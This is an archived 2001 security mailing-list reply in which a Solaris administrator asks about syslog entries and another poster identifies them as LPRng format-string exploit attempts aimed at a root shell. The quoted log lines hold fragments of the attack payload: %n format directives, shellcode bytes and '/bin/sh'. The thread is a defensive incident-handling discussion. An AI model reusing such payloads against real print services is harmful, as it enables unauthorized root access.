RE: solaris hack info required

From: Ivy Lane (ivylane24at_private)
Date: Fri Jun 29 2001 - 10:22:48 PDT

Next message: William Knowles: "Interesting group of scans"

Previous message: Crist Clark: "Re: Strange broadcasts to printer port"
Maybe in reply to: Mark Hollow: "solaris hack info required"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This is called "trying to use LPR's logging function" to get a shell.
This is the LPRng string format _syslog bug that theoretically could allow 
root access.
Read this:
http://www.securityfocus.com/vdb/bottom.html?vid=1712

Solaris 8 is not listed as vulnerable.

Give the man a peanut!


IN RESPONSE TO:
*******************************************
Hi,

Any help you can give me would be appreciated.

I've a Sun Netra X1 (Solaris 8) with a /var/adm/messages file full of these
messages at frequent but irregular intervals (approx every 5-10 seconds for
several hours).

Jun 24 03:43:02 jim bsd-gw[13276]: [ID 315218 lpr.error] Invalid protocol r
equest (66):
BBBXXXXXXXXXXXXXXXXXX%.156u%300$n%.21u%301$nsecurity%302$n%.192u%30
3$n111F1f1C]C]KMM1ECf]fE'MEEEMCCC1?A^u1FEMU/bin/sh
Jun 24 03:43:03 jim bsd-gw[13277]: [ID 315218 lpr.error] Invalid protocol r
equest (66):
BBB()*+XXXXXXXXXXXXXXXXXX%.232u%300$n%.199u%301$nsecurity.i%302$n%.
192u%303$n111F1f1C]C]KMM1ECf]fE'MEEEMCCC1?A^u1FEMU/bin/sh
Jun 24 03:43:03 jim bsd-gw[13278]: [ID 315218 lpr.error] Invalid protocol r
equest (66):
BBBHIJKXXXXXXXXXXXXXXXXXXsecurity%300$n%.167u%301$nsecurity.i%302$n
%.192u%303$n111F1f1C]C]KMM1ECf]fE'MEEEMCCC1?A^u1FEMU/bin/sh
Jun 24 03:43:03 jim bsd-gw[13279]: [ID 315218 lpr.error] Invalid protocol r
equest (66):
BBBXXXXXXXXXXXXXXXXXX%.136u%300$n%.41u%301$nsecurity%302$n%.192u%30
3$n111F1f1C]C]KMM1ECf]fE'MEEEMCCC1?A^u1FEMU/bin/sh
Jun 24 03:43:04 jim bsd-gw[13280]: [ID 315218 lpr.error] Invalid protocol r
equest (66):
BBBXXXXXXXXXXXXXXXXXX%.72u%300$n%.106u%301$nsecurit%302$n%.192u%303
$n111F1f1C]C]KMM1ECf]fE'MEEEMCCC1?A^u1FEMU/bin/sh

Do any of you recognise this? If so, what should I be looking for to see if
the hack was successful?

TIA,
Mark



----------------------------------------------------------------------------


This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see:

http://aris.securityfocus.com

_________________________________________________________________
Get your FREE download of MSN Explorer at http://explorer.msn.com



----------------------------------------------------------------------------


This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see:

http://aris.securityfocus.com

Next message: William Knowles: "Interesting group of scans"
Previous message: Crist Clark: "Re: Strange broadcasts to printer port"
Maybe in reply to: Mark Hollow: "solaris hack info required"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Sat Jun 30 2001 - 09:28:07 PDT